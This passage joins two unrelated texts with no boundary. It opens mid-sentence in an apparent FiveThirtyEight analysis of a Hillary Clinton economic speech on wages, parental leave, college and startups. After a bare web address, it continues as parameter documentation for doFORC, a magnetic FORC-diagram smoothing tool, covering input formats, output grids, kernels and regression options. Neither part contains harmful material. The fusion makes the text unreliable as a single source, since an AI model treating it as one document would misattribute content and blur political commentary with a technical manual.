candidates, calling out Jeb Bush, Scott Walker and Marco Rubio by name. Notably absent from her speech, however, was any reference to her opponents for the Democratic nomination, including Vermont Sen. Bernie Sanders and former Maryland Gov. Martin O’Malley. 
But Clinton’s focus on inequality and wages, along with her criticism of Wall Street and measured skepticism of free trade agreements, was no doubt partly intended to shore up support among the liberal wing of her party. Here are a few key passages from Clinton’s speech, along with some context and analysis. (Quotes are from a preliminary transcript.)

Previous generations of Americans built the greatest economy and strongest middle class the world has ever known on the promise of a basic bargain: If you work hard and do your part, you should be able to get ahead. And when you get ahead, America gets ahead. But over the past several decades, that bargain has eroded.

The core of Clinton’s message is that middle-class incomes have stagnated in recent years, not just during the recession and its aftermath but even during better economic times. That’s true, though the middle class’s struggles are sometimes exaggerated. The typical (median) U.S. household earned just less than $52,000 before taxes in 2013, the latest year for which full data is available. Adjusting for inflation, that’s less than in 1989, suggesting that the middle class has experienced two and a half decades of income stagnation.

Reality isn’t quite that grim. The Census Bureau’s income statistics don’t account for the fact that the typical American household is smaller today than it was 25 years ago. That’s a big deal because a single person living on $50,000 has a much higher standard of living than a family of six trying to squeeze by on the same amount. Adjust for household size, and incomes are up significantly since the late 1980s. Even adjusting for household size, however, median income has been more or less stagnant since 2000. Some economists propose other adjustments to the census figures, such as using a different measure of inflation and looking at after-tax rather than pre-tax income.
But while the exact figures are in dispute, the overall trend is not: Income growth has been far slower since 2000 than in the decades before. The measure of our success must be how much incomes rise for hard-working families, not just for successful CEOs and money managers and not just some arbitrary growth targets untethered to people’s lives and livelihoods. Clinton didn’t mention him by name until later in her speech, but there’s little doubt this line was intended as a shot at former Florida Gov. Jeb Bush, one of the leading candidates on the Republican side of the campaign. Bush has pledged to deliver a 4 percent annual growth rate, which he has argued is the best way to help the middle class. Clinton says economic growth alone doesn’t necessarily translate into more money for the middle class. There’s evidence to back that up: In recent decades, the share of national income that goes to workers has fallen while the share going to corporate profits has risen. Taken at face value, the numbers mean workers aren’t benefiting as much from economic growth as they used to. Some economists, however, have recently questioned whether workers’ piece of the economic pie has shrunk as much as the official figures show, though they don’t dispute that the so-called labor share fell significantly during the recession. Moreover, even if the long-term decline is real, it has been a global phenomenon, affecting virtually the entire developed world, including many countries with very different economic systems than the U.S.’s. That raises questions about whether Clinton — or any president — could do much to reverse the trend. It’s also worth noting that the one recent period when the labor share clearly rose was in the late 1990s, which was also the last time economic growth exceeded 4 percent for an extended period. 
That doesn’t guarantee a repeat performance, but it does hint that a period of particularly strong growth can have benefits for workers up and down the earnings spectrum. (The late 1990s were also, of course, the last time a president named Clinton was in office.) We also have to invest in our students and our teachers at every level, and in the coming weeks and months, I will lay out specific steps to improve our schools, make college truly affordable and help Americans refinance their student debt. This was nearly the only reference to college in Clinton’s speech, which might seem surprising given her focus on income: For decades, Democrats have stressed expanding access to college as a key way to reduce income inequality and expand the middle class. On an individual level, there’s little doubt that going to college remains the clearest pathway to a good job: The unemployment rate for college graduates was 2.5 percent in June, compared with 5.4 percent for those with only a high school diploma. The typical young bachelor’s degree holder in 2013 earned two-thirds more than the typical high school graduate, and one-third more than the typical worker with an associate degree, according to census data. But while a college education can clearly improve an individual’s job prospects, some economists — including many on the left — argue that education can’t do much to reduce inequality in the country as a whole. As more and more Americans go to college, the supply of college graduates has grown; more than 35 percent of Americans ages 25 to 34 now have at least a bachelor’s degree, up from less than 10 percent 30 years ago. That’s fine as long as employers keep needing more college-educated workers, but recent research suggests that demand for college graduates has leveled off or is even declining. Perhaps as a result, the college-wage premium — how much more college graduates earn than nongraduates — has stopped rising. 
The movement of women into the American workforce over the past 40 years was responsible for more than $3.5 trillion in economic growth. But that progress has stalled.

Another major plank of Clinton’s economic plan is offering families, and working mothers in particular, family-friendly policies like paid parental leave. Compared with most wealthy nations, the U.S. offers workers less paid (and unpaid) parental leave. According to a 2008 analysis by the left-leaning Center for Economic and Policy Research, the U.S. ranks 20th out of 21 wealthy countries in offering two-parent families a combined 24 weeks of unpaid parental leave — and that is only for the 60 percent of workers covered through the Family and Medical Leave Act. Currently, only 12 percent of Americans get paid parental leave through their job, and predictably those benefits are more common for higher-income people.

Clinton argued that in addition to promoting fairness, expanding paid parental leave can have serious economic benefits. One way these policies could affect the economy as a whole is by helping to reverse the troubling long-term decline in the share of the population that’s participating in the labor force. The so-called labor force participation rate — the share of the population that’s either working or actively looking for work — has been falling for years and stands at its lowest level since the late 1970s. The decline poses a major economic challenge because it leaves fewer workers to support the nonworking population.

The drop has been particularly pronounced among men, whose participation rate has been falling for decades. But just as important has been the leveling off and then eventual decline in participation among women. Female labor force participation peaked at about 60 percent in 2000 and has been falling ever since.
The U.S., which once had one of the highest female labor force participation rates in the world, according to data from the OECD, now ranks below Latvia, Estonia, Slovenia and a bunch of other countries. Liberal economists, including those on Clinton’s team, have long argued that the U.S. could help more women work if it offered more generous family benefits. Research estimates that the U.S.’s stingier parental leave policies explain about 30 percent of its relatively low female labor-force participation rate. Some states have already instituted family-friendly policies similar to those outlined in Clinton’s speech. California, Rhode Island and New Jersey fund insurance programs that provide four to six weeks of paid family care leave. Advocates for paid parental leave policies also cite other economic benefits, such as reduced employee turnover. Today’s marketplace focuses too much on the short-term, like second-to-second financial trading and quarterly earnings reports, and too little on long-term investments. Clinton sketched out several ideas for reforming corporate America. She advocated for profit-sharing policies, which offer workers an ownership piece in the company they work for, with the goal to boost worker productivity and to distribute the company’s stock gains more evenly. Clinton said “studies show that profit sharing that gives everyone a stake in the company’s success can boost productivity and put money directly into employees’ pockets.” In a speech later this week in New Hampshire, she will have more to say on this issue. Clinton also decried “quarterly capitalism,” or the short-termism of corporate America. Citing the declining rates of business investment in things like factories and research labs and the explosion of share buybacks and dividends, she pledged to better align corporate decisions for long-term growth. But she didn’t say how she would do that. 
Some potential policies can be found in a report published by the left-leaning (and Clinton-allied) Center for American Progress earlier this year. To encourage more long-term thinking by executives, the report proposed lengthening the time before executive stock options are fully vested, and limiting how many options executives can exercise.

Clinton suggested other reforms that would affect corporate America, including the Buffett rule — named after billionaire Warren Buffett — that would institute a minimum tax of 30 percent on those making more than $1 million a year. She also proposed closing the carried-interest loophole, which allows those who make the bulk of their income from capital gains (such as hedge fund managers) to pay a lower overall tax rate.

Small businesses create more than 60 percent of new American jobs on net, so they have to be a top priority. I’ve said I want to be the small-business president, and I mean it. And throughout this campaign, I’m going to be talking about how we empower entrepreneurs with less red tape, easier access to capital, tax relief and simplification.

Politicians love to talk about the importance of small businesses, but economic research has found that the real drivers of job growth aren’t small businesses but new businesses: Fast-growing startups account for a disproportionate share of hiring. New companies are also key sources of innovation and productivity gains. But entrepreneurship in the U.S. is in trouble. The rate at which Americans start new businesses has been falling for 30 years, a decline that cuts across industries and geographies. The trend may be surprising given the buzz around Uber, Airbnb and other high-profile Silicon Valley startups. But for all the talk of “disruption,” data from multiple sources suggests that the American economy has become more comfortable for big incumbent businesses and less hospitable to entrepreneurs.
Clinton’s pledge to cut red tape and provide easier access to capital could just as easily have come from a speech from one of her Republican opponents. But the truth is economists aren’t sure what’s behind the decline in startups, which makes it hard to develop policies to combat it. Talent is universal; you find it everywhere. But opportunity is not. There are nearly 6 million young people aged 16 to 24 in America today who are not in school or at work. The numbers for young people of color are particularly staggering. A quarter of young black men and nearly 15 percent of all Latino youth cannot find a job. Clinton’s decision to highlight young people who are neither working nor in school is notable because it’s an economic measure that tends to get relatively little attention in the U.S. In Europe, the concept is so widely discussed that even mainstream news outlets routinely refer to “NEETs,” short for “not in employment, education or training.” In some European countries such as Greece and Italy, more than 30 percent of people ages 20 to 24 are NEETs. The problem isn’t nearly as severe in the U.S., but it is still significant. Nearly 19 percent of American 20- to 24-year-olds were neither working nor in school in 2013, according to OECD data. That’s little better than in the worst of the recession and is up from 15.5 percent in 2005. And as Clinton said, the numbers are far worse for many minority groups. OECD doesn’t break down its data by race, but according to data from the Bureau of Labor Statistics, 22 percent of black men ages 16 to 24 are neither in school nor working, compared with 16 percent of all Americans in that age group. Ben Casselman is a senior editor and the chief economics writer for FiveThirtyEight. Andrew Flowers is FiveThirtyEight’s quantitative editor.
http://stoner.phys.uaic.ro/forc/doforc/doforc-parameters.html
doFORC Parameters

### Configuration file and keywords for doFORC

Acronyms:
• $\mathcal{O}$ = Optional
• $\mathcal{M}$ = Mandatory
• N/A = Not Applicable

Each keyword below is listed as: keyword ($\mathcal{O}$ or $\mathcal{M}$; type; default value; accepted values), followed by its description.

**Input data**

**input_file** ($\mathcal{M}$; string; default: N/A; accepted: N/A)
File containing the input data.
• file name and/or its path may contain blank spaces
• comments beginning with an exclamation point (!) are ignored
• non-numeric lines are treated as blank lines
• line terminator (the character or sequence of characters that marks the end of a line of text) can be CR (usually Macintosh files), LF (usually Unix files), or CRLF (usually Windows files). All lines in a given file must have the same terminator.
• the different values (columns) in a line can be separated by spaces, tabs, commas, semicolons, or a combination of them

**input_file_format** ($\mathcal{M}$; string; default: N/A; accepted: PMC, h_m, ha_hr_m, hr_ha_m)

| file format | column_1 | column_2 | column_3 | column_4 |
|---|---|---|---|---|
| PMC | $h_{\mathrm{applied}}$ | magnetic_moment | user weight (optional) | |
| h_m | $h_{\mathrm{applied}}$ | magnetic_moment | user weight (optional) | |
| ha_hr_m | $h_{\mathrm{applied}}$ | $h_{\mathrm{reversal}}$ | magnetic_moment | user weight (optional) |
| hr_ha_m | $h_{\mathrm{reversal}}$ | $h_{\mathrm{applied}}$ | magnetic_moment | user weight (optional) |

• lines with fewer columns are treated as blank lines
• any additional columns are ignored
• $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right)$ play the role of the independent variables $\left( x,y \right)$, also known as explanatory variables, input, predictor, regressor, feature, etc.
• magnetic_moment plays the role of the dependent variable $f$, also known as output, outcome, response, etc.
PMC
• file can have any of the PMC / Lakeshore file formats
• header lines are not mandatory
• each FORC curve must be preceded by the drift field measurement and a blank line
• each FORC must be followed by a blank (non-numeric) line
• the first line from a FORC is the reversal point
• the first FORC does not need to contain a single point

h_m
• similar to the PMC format, but without the drift field measurements
• each FORC must be followed by a blank (non-numeric) line
• the first line from a FORC is the reversal point

ha_hr_m
• the first three columns represent the $\left( x,y,z \right)$ Cartesian coordinates
• blank and non-numeric lines are ignored

hr_ha_m
• the first three columns represent the $\left( x,y,z \right)$ Cartesian coordinates
• blank and non-numeric lines are ignored

**drift_correction** ($\mathcal{O}$; logical; default: false; accepted: true, false)
Only for the PMC / Lakeshore format.

**uw** ($\mathcal{O}$; logical; default: false; accepted: true, false)
User weights to give to individual observations in the sum of squared residuals that forms the local fitting criterion.
• false: no user weight is provided.
• true: user weights (nonnegative values) are provided as a 3rd (PMC and h_m data) or 4th (otherwise) column in input_file. If an observation's weight is zero or negative, the observation is ignored in the analysis.

**atol** ($\mathcal{O}$; real; default: 0.0; accepted: atol ≥ 0)
**rtol** ($\mathcal{O}$; real; default: 0; accepted: rtol ≥ 0)
Remove points that are closer than some tolerance (duplicate or nearby points) from input_file. Only one of the atol and rtol tolerance parameters can be used:
• atol = absolute tolerance
• rtol = tolerance relative to the size of the smallest $h_{\mathrm{applied}}$, $h_{\mathrm{reversal}}$ interval
The default value removes only the duplicate points.

**fill_x-steps_gt** ($\mathcal{O}$; real; default: 0; accepted: ≥ 0)
Resample individual FORCs by filling gaps greater than 'fill_x-steps_gt' on each individual FORC [curves given by the points with the same $y$ ($h_{\mathrm{reversal}}$) coordinate], in the preprocessing step.
This feature is useful in the case of missing data or of large gaps in the input data. A statistic regarding the values of the increment $dx$ on each individual curve and, respectively, of the increment $dy$ between curves is provided in the Command Prompt window. Default value = no filling.

**merge_x-steps_lt** ($\mathcal{O}$; real; default: 0; accepted: ≥ 0)
Resample individual FORCs by merging the points that are separated by steps less than 'merge_x-steps_lt' on each individual FORC [curves given by the points with the same $y$ ($h_{\mathrm{reversal}}$) coordinate], in the preprocessing step. This feature is useful in the case of "very close" points in the input data. The merging procedure may return points that were not input points, and it can even have a "smoothing effect". The first point, corresponding to the smallest value of the $x$ ($h_{\mathrm{applied}}$) coordinate on each individual FORC, is not modified. Default value = no merging.

**nn_iFORC** ($\mathcal{O}$; integer; default: 0; accepted: nn_iFORC = 0 or nn_iFORC ≥ 2)
Number of nearest neighbors used to smooth each individual FORC with respect to $h_{\mathrm{applied}}$, in the preprocessing step. Smoothing is performed with a local regression around each input point, the size of each neighborhood being chosen so that the neighborhood contains at most nn_iFORC+1 data points. The individually smoothed curves will subsequently be smoothed with respect to both $h_{\mathrm{applied}}$ and $h_{\mathrm{reversal}}$, in the processing step. Default value = no smoothing.

**noncircularity** ($\mathcal{O}$; real; default: 1.0; accepted: > 0)
Scale factor for the input data before the smoothing process, in the preprocessing step: $\;\overline{y}=\dfrac{y}{\mathrm{noncircularity}}$. The scale factor changes the shape of the neighborhood, considering the points lying on an ellipse centered at the given point to be equidistant from that point, and it is useful when the variables have different scales. After smoothing, all the data are transformed back to their original state.
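The gap-filling idea behind fill_x-steps_gt above can be sketched roughly as follows. This is my own illustration of the concept, not doFORC's actual implementation, and the use of linear interpolation for the inserted points is an assumption:

```python
def fill_gaps(xs, ms, max_step):
    """Insert linearly interpolated (x, moment) points along one FORC
    wherever the step in x exceeds max_step (illustrative only).
    xs must be sorted in increasing order."""
    out_x, out_m = [xs[0]], [ms[0]]
    for x0, x1, m0, m1 in zip(xs, xs[1:], ms, ms[1:]):
        gap = x1 - x0
        if gap > max_step:
            # number of extra points so that every resulting step <= max_step
            n_extra = int(gap // max_step)
            for i in range(1, n_extra + 1):
                t = i / (n_extra + 1)
                out_x.append(x0 + t * gap)
                out_m.append(m0 + t * (m1 - m0))
        out_x.append(x1)
        out_m.append(m1)
    return out_x, out_m
```

For example, a curve with points at $x = 0$ and $x = 1$ and a threshold of 0.5 gains two interpolated points, so that no step exceeds the threshold.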
Default value = no scaling of the independent variables $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right) \equiv \left( x,y \right)$.

**standardize_data** ($\mathcal{O}$; integer; default: 0; accepted: 0, 1, 2, 3, 4)
Standardize the input data before the smoothing process, in the preprocessing step: $\;\overline{x}=\dfrac{x-x_{\mathrm{mean}}}{\sigma _x}$, $\;\overline{y}=\dfrac{y-y_{\mathrm{mean}}}{\sigma _y}$, $\;\overline{z}=\dfrac{z}{\sigma_z}$, where $x_{\mathrm{mean}}$, $y_{\mathrm{mean}}$ are the Winsorized mean values of each variable, and $\sigma _x$, $\sigma _y$, $\sigma_z$ the Winsorized standard deviations of each variable. The Winsorized mean and standard deviation are robust scale estimators in that extreme values of a variable are discarded (the smallest and largest 5% of the data) before estimating the data scaling. Standardization changes the shape of the neighborhood and is useful when the variables have significantly different scales. After smoothing, all the data are transformed back to their original state.

0:
• no standardization, the data remain unchanged
1:
• independent variables are divided (scaled) by the same scale factor $=\mathrm{max}\left( \sigma _x,\sigma _y\right)$ → does NOT change the shape of the neighborhood
• dependent variable is NOT scaled
2:
• independent variables are scaled by $\sigma _x$ and $\sigma _y$, respectively → DOES change the shape of the neighborhood
• dependent variable is NOT scaled
3:
• independent variables are scaled by the same scale factor $=\mathrm{max}\left( \sigma _x,\sigma _y\right)$ → does NOT change the shape of the neighborhood
• dependent variable is scaled by $\sigma _z$ → can affect the statistics
4:
• independent variables are scaled by $\sigma _x$ and $\sigma _y$, respectively → DOES change the shape of the neighborhood
• dependent variable is scaled by $\sigma _z$ → can affect the statistics

**curves_to_be_processed** ($\mathcal{O}$; string; default: all; accepted: positive integers, $dy \geq 0$, extend)
Curves (FORCs) to be processed in the processing step.
The command has three optional subcommands (parts):
• a list of the curves that will be processed, given as a list of values, a loop construct start:end:increment where the increment is optional (default increment is 1), as a combination of them, or as one of the keywords 'all', 'odd', 'even'
• the minimum increment (step) dy between the curves selected according to the first subcommand; the curves for which the value of the increment between them is smaller than dy will not be processed
• the first two subcommands can restrain (if necessary) the cropped region defined by ha_in_min, ..., ha_min, ..., hc_min, ..., or x_min, ...; the cropped region can be extended to the maximum values allowed by the first two subcommands using the third subcommand, 'extend' or 'ext'

For example, '10:30:2 dy=0.01 extend' will select from the curves 10, 12, ..., 28, 30 those curves for which the value of the increment between them is greater than 0.01, and will extend the cropped region to the maximum allowed values. Default value = all curves will be processed.

**Output data**

**output_points** ($\mathcal{O}$; string; default: input_points)

input_points
Output is provided at the input $\left( h_{\mathrm{applied}},h_{\mathrm{reversal}} \right) \equiv \left( x,y \right)$ points. This option is intended both for FORC diagrams (or other derivatives) calculation and for general use, as the calculation is made at the points provided in the input file.

ha_hr_regular_grid
Output is provided in a regular grid with:
• nha × nhr points
• $\mathrm{ha\_min} \leq h \, _{\mathrm{applied}}^{\mathrm{grid}} \leq \mathrm{ha\_max}$
• $\mathrm{hr\_min} \leq h \, _{\mathrm{reversal}}^{\mathrm{grid}} \leq \mathrm{hr\_max}$
• points with $h \, _{\mathrm{applied}}^{\mathrm{grid}} < h \, _{\mathrm{reversal}}^{\mathrm{grid}}$ are ignored
This option is intended for FORC diagrams (or other derivatives) calculation.
hc_hu_regular_grid
Output is provided in a regular grid with:
• nhc × nhu points
• $\mathrm{hc\_min} \leq h \, _{\mathrm{coercive}}^{\mathrm{grid}} \leq \mathrm{hc\_max}$
• $\mathrm{hu\_min} \leq h \, _{\mathrm{interaction}}^{\mathrm{grid}} \leq \mathrm{hu\_max}$
where $\left\{ \begin{array}{l}h _{\mathrm{coercive}}=\dfrac{h_{\mathrm{applied}}-h _{\mathrm{reversal}}}{2} \\ h\,_{\mathrm{interaction}}=\dfrac{h_{\mathrm{applied}}+h\,_{\mathrm{reversal}}}{2}\end{array}\right.$, $\left\{ \begin{array}{l}h_{\mathrm{applied}}=h _{\mathrm{interaction}}+h _{\mathrm{coercive}} \\ h _{\mathrm{reversal}}=h _{\mathrm{interaction}}-h _{\mathrm{coercive}}\end{array}\right.$
This option is intended for FORC diagrams (or other derivatives) calculation.

rectangular_grid
Output is provided in a regular rectangular grid with:
• nx × ny points
• $\mathrm{x\_min} \leq x^{\mathrm{grid}} \leq \mathrm{x\_max}$
• $\mathrm{y\_min} \leq y^{\mathrm{grid}} \leq \mathrm{y\_max}$
This option is intended for general use.

user_points
Output is provided at the user-defined points from user_output_points_file. This option is intended both for FORC diagrams (or other derivatives) calculation and for general use, as the calculation is made at the points provided by the user.

**user_output_points** ($\mathcal{M}$; string; default: N/A; accepted: N/A)
Only for output_points = user_points.

**ha_in_min** ($\mathcal{O}$; real; accepted: $\geq \min \left( h_{\mathrm{applied}}\right)$)
Only for output_points = input_points. Together with ha_in_max, hr_in_min, and hr_in_max, crops the input points, ignoring the points that are outside the domain $\left[ \mathrm{ha\_in\_min},\,\mathrm{ha\_in\_max}\right] \times \left[ \mathrm{hr\_in\_min},\,\mathrm{hr\_in\_max}\right]$.
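The $(h_{\mathrm{applied}}, h_{\mathrm{reversal}}) \leftrightarrow (h_{\mathrm{coercive}}, h_{\mathrm{interaction}})$ change of coordinates above is a simple linear transform; a minimal sketch of both directions (function names are mine, not doFORC's):

```python
def ha_hr_to_hc_hu(ha, hr):
    """(h_applied, h_reversal) -> (h_coercive, h_interaction),
    per the definitions hc = (ha - hr)/2, hu = (ha + hr)/2."""
    return (ha - hr) / 2.0, (ha + hr) / 2.0

def hc_hu_to_ha_hr(hc, hu):
    """Inverse transform: ha = hu + hc, hr = hu - hc."""
    return hu + hc, hu - hc
```

Composing the two functions recovers the original field pair, which is the round-trip property the two bracketed systems in the table express.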
In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{ha\_in\_min}-\Delta h_{a},\,\mathrm{ha\_in\_max}+\Delta h_{a}\right] \times \left[ \mathrm{hr\_in\_min}-\Delta h_{r},\,\mathrm{hr\_in\_max}+\Delta h_{r}\right]$, where $\left\{ \begin{array}{l} \Delta h_{a}=0.1\left( \,\max \left( h_{\mathrm{applied}}\right) -\min \left( h_{\mathrm{applied}}\right) \right) \\ \Delta h_{r}=0.1\left( \,\max \left( h_{\mathrm{reversal}}\right) -\min \left( h_{\mathrm{reversal}}\right) \right) \end{array}\right.$

**ha_in_max** ($\mathcal{O}$; real; accepted: $\leq \max \left( h_{\mathrm{applied}}\right)$)
**hr_in_min** ($\mathcal{O}$; real; accepted: $\geq \min \left( h_{\mathrm{reversal}}\right)$)
**hr_in_max** ($\mathcal{O}$; real; accepted: $\leq \max \left( h_{\mathrm{reversal}}\right)$)

**nha** ($\mathcal{M}$; integer; accepted: nha > 0)
Only for output_points = ha_hr_regular_grid. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{ha\_min}-\Delta h_{a},\,\mathrm{ha\_max}+\Delta h_{a}\right] \times \left[ \mathrm{hr\_min}-\Delta h_{r},\,\mathrm{hr\_max}+\Delta h_{r}\right]$, where $\left\{ \begin{array}{l} \Delta h_{a}=0.1\left( \mathrm{ha\_max} - \mathrm{ha\_min} \right) \\ \Delta h_{r}=0.1\left( \mathrm{hr\_max} - \mathrm{hr\_min} \right) \end{array}\right.$

**ha_min** ($\mathcal{M}$; real; accepted: $\geq \min \left( h_{\mathrm{applied}}\right)$)
**ha_max** ($\mathcal{M}$; real; accepted: $\leq \max \left( h_{\mathrm{applied}}\right)$)
**nhr** ($\mathcal{M}$; integer; accepted: nhr > 0)
**hr_min** ($\mathcal{M}$; real; accepted: $\geq \min \left( h_{\mathrm{reversal}}\right)$)
**hr_max** ($\mathcal{M}$; real; accepted: $\leq \max \left( h_{\mathrm{reversal}}\right)$)

**nhc** ($\mathcal{M}$; integer; accepted: nhc > 0)
Only for output_points = hc_hu_regular_grid.
In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{hc\_min}-\Delta h_{c},\,\mathrm{hc\_max}+\Delta h_{c}\right] \times \left[ \mathrm{hu\_min}-\Delta h_{u},\,\mathrm{hu\_max}+\Delta h_{u}\right]$, where $\left\{ \begin{array}{l} \Delta h_{c}=0.1\left( \mathrm{hc\_max} - \mathrm{hc\_min} \right) \\ \Delta h_{u}=0.1\left( \mathrm{hu\_max} - \mathrm{hu\_min} \right) \end{array}\right.$

**hc_min** ($\mathcal{M}$; real; accepted: $\geq\min \left( h_{\mathrm{coercive}}\right)$)
**hc_max** ($\mathcal{M}$; real; accepted: $\leq\max \left( h_{\mathrm{coercive}}\right)$)
**nhu** ($\mathcal{M}$; integer; accepted: nhu > 0)
**hu_min** ($\mathcal{M}$; real; accepted: $\geq \min \left( h_{\mathrm{interaction}}\right)$)
**hu_max** ($\mathcal{M}$; real; accepted: $\leq \max \left( h_{\mathrm{interaction}}\right)$)

**nx** ($\mathcal{M}$; integer; accepted: nx > 0)
Only for output_points = rectangular_grid. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{x\_min}-\Delta x,\,\mathrm{x\_max}+\Delta x\right] \times \left[ \mathrm{y\_min}-\Delta y,\,\mathrm{y\_max}+\Delta y\right]$, where $\left\{ \begin{array}{l} \Delta x=0.1\left( \mathrm{x\_max} - \mathrm{x\_min} \right) \\ \Delta y=0.1\left( \mathrm{y\_max} - \mathrm{y\_min} \right) \end{array}\right.$

**x_min** ($\mathcal{M}$; real; accepted: $\geq \min \left( x\right)$)
**x_max** ($\mathcal{M}$; real; accepted: $\leq \max \left( x\right)$)
**ny** ($\mathcal{M}$; integer; accepted: ny > 0)
**y_min** ($\mathcal{M}$; real; accepted: $\geq \min \left( y\right)$)
**y_max** ($\mathcal{M}$; real; accepted: $\leq \max \left( y\right)$)

**nsb** ($\mathcal{O}$; integer; default: 0; accepted: $\mathrm{nsb} \geq 0$)
Number of points to skip at the border $h_{\mathrm{applied}}=h_{\mathrm{reversal}}$ or $h_{\mathrm{coercive}}=0$ in a regular grid output. These points are only omitted in the output data, not in the calculations. This option is useful to hide the possible boundary effects (numerical artifacts).
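Putting several of the keywords above together, a configuration for a regular $(h_{\mathrm{applied}}, h_{\mathrm{reversal}})$ grid output might look roughly like the sketch below. The keyword = value layout, the '!' comment syntax, and the file name are my assumptions for illustration; consult the doFORC distribution for the actual configuration syntax.

```
! illustrative sketch only; layout and file name are assumed
input_file          = forc_measurement.frc
input_file_format   = PMC
drift_correction    = true
output_points       = ha_hr_regular_grid
nha     = 100
ha_min  = -0.3
ha_max  = 0.3
nhr     = 100
hr_min  = -0.3
hr_max  = 0.3
nsb     = 2
```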
order_of_derivative ($\mathcal{O}$, integer, default 0, allowed 0 to 6): Order of the partial derivatives to be numerically computed in the output_points.

- 0: zero derivative, i.e., the smoothed (estimated) value $\hat{f}$
- 1, 2: first order derivatives $\dfrac{\partial \hat{f}}{\partial x}$, $\dfrac{\partial \hat{f}}{\partial y}$
- 3, 4, 5: second order derivatives $\dfrac{\partial ^{2}\hat{f}}{\partial x^{2}}$, $\dfrac{\partial ^{2}\hat{f}}{\partial x\partial y}$, $\dfrac{\partial ^{2}\hat{f}}{\partial y^{2}}$
- 6: FORC diagram $=-\dfrac{1}{2}\dfrac{\partial ^{2}\hat{f}}{\partial x\partial y}$

format ($\mathcal{O}$, string, default g17.5e3): Format at which the values in the output files are to be saved.

- Exponential form with 'D' exponents: Dw.d, requisite $\mathrm{w} > \mathrm{d}+7$. The printed number has a zero digit as the integral part, the middle d positions are for the number in normalized form, and the last three positions are for the exponent, including its sign.
- Exponential form with 'E' exponents: Ew.d, requisite $\mathrm{w} > \mathrm{d}+7$; or Ew.dEe, requisite $\mathrm{w} > \mathrm{d}+\mathrm{e}+5$. The only difference from the above is that the exponent part has e positions plus one more for its sign.
- Engineering form: ENw.d, requisite $\mathrm{w} > \mathrm{d}+9$; or ENw.dEe, requisite $\mathrm{w} > \mathrm{d}+\mathrm{e}+7$. The printed number has no more than three and at least one non-zero digits, and the exponent is a multiple of three.
- Scientific form: ESw.d, requisite $\mathrm{w} > \mathrm{d}+7$; or ESw.dEe, requisite $\mathrm{w} > \mathrm{d}+\mathrm{e}+5$. The printed number has one non-zero digit as the integral part.
- Decimal form (no exponent): Fw.d, requisite $\mathrm{w} > \mathrm{d}+2$. If $d=0$ no fractional part will be printed, the right-most position being the decimal point.
- Mixture of the F and E formats: Gw.d or Gw.dEe, requisites as above. If a number can reasonably be printed with F format, that is used; all others (very large and very small) are displayed in E format.

where:
- w = number of positions to be used to write a number including its sign, decimal point, decimal places, exponent part and leading spaces between two consecutive numbers on a line
- d = number of digits to the right of the decimal point
- e = number of digits in the exponent part without its sign

Warning: errors with FORMAT are not detected until writing time, when the output can be asterisks *.

Regression / Least squares fit

regression_method ($\mathcal{O}$, string, default qshep):

- loess: LOESS (LOcal regrESSion) method using quadratic polynomials for the local fitting
- qshep: quadratic → modified quadratic polynomial Shepard method
- cshep: cubic → modified cubic polynomial Shepard method
- tshep: trigonometric → modified cosine series Shepard method

drop_x2, drop_y2 ($\mathcal{O}$, logical, default false, allowed true/false): Drop square: only for 'regression_method = loess' or 'regression_method = qshep'. Specifies the quadratic monomials to exclude from the local quadratic fits. For example, 'drop_x2 = false, drop_y2 = true' uses the monomials 1, $x$, $y$, $x^{2}$, and $xy$ in performing the local fitting.

kernel ($\mathcal{O}$, integer, default 6):

- 1: uniform (rectangular window), $1$
- 2: triangular, $1-\left\vert u\right\vert$
- 3: Epanechnikov (quadratic, parabolic), $1-u^{2}$
- 4: quartic (biweight, bisquare), $\left( 1-u^{2}\right) ^{2}$
- 5: triweight, $\left( 1-u^{2}\right) ^{3}$
- 6: tricube, $\left( 1-\left\vert u\right\vert ^{3}\right) ^{3}$
- 7: raised cosine (Tukey-Hanning), $\dfrac{1+\cos \left( \pi u\right) }{2}$
- 8: cosine, $\cos \left( \dfrac{\pi }{2}u\right)$
- 9: Gaussian, $\exp\left( -\dfrac{1}{2}\dfrac{u^{2}}{\sigma ^{2}}\right)$
- 10: exponential, $\exp \left( -\lambda \left\vert u\right\vert \right)$
- 11: inverse distance, $\dfrac{1}{1+\left\vert u\right\vert }$
- 12: Cauchy, $\dfrac{1}{1+u^{2}}$
- 13: Parzen, $\left\{ \begin{array}{ll} 1-6u^{2}+6\left\vert u\right\vert ^{3} & \mathrm{if\enspace }0\leq \left\vert u\right\vert <0.5 \\ 2\left( 1-\left\vert u\right\vert \right) ^{3} & \mathrm{if\enspace }0.5\leq \left\vert u\right\vert \leq 1 \end{array} \right.$
- 14: McLain, $\dfrac{1}{\left( \varepsilon +\left\vert u\right\vert \right) ^{2}}$
- 15: Franke-Nielson, $\dfrac{1-\left\vert u\right\vert }{\varepsilon +\left\vert u\right\vert }$

uif ($\mathcal{O}$, real, default 1.0): User interpolation factor = scale factor for the weight associated with a node in the least squares system for the corresponding nodal function. A large weight can be used to force interpolation. The default value 1 means "pure" fitting.

nrr ($\mathcal{O}$, integer, default 0, nrr ≥ 0): Number of robust locally weighted regressions: the initial fit is followed by nrr iteratively reweighted iterations. Such iterations are appropriate when there are outliers in the data or when the error distribution is a symmetric long-tailed distribution. If nrr is provided then:
- nn_list should be provided also
- no CRITERION (or DEFAULT) should be provided
- only (nn, RSS, RSSm) is provided as statistics
The default value 0 means no robust regression.

nn_list, nn_range: Number of nearest neighbors nn (smoothing parameter) = number of data points to be used in the least squares fit for coefficients defining the nodal functions.
- the radius of each neighborhood is chosen so that the neighborhood contains a specified number of the data points
- nn in each local neighborhood controls the smoothness of the estimated surface
- minimum value of nn: loess: 7, qshep: 6, cshep: 10, tshep: 10 (each of drop_x2 and drop_y2 decreases by one unit the minimum value of nn required by the loess and qshep methods respectively)
- one of the nn_list or nn_range options is required
- only one of the nn_list and nn_range options can be used

nn_list ($\mathcal{M}$, integer, default N/A, see above): specifies a list of positive integer nn values and can be given as:
- a list of values, separated by spaces or by commas
- a loop construct start : end : increment, where increment is optional (the default increment is 1)
- a combination of the above methods
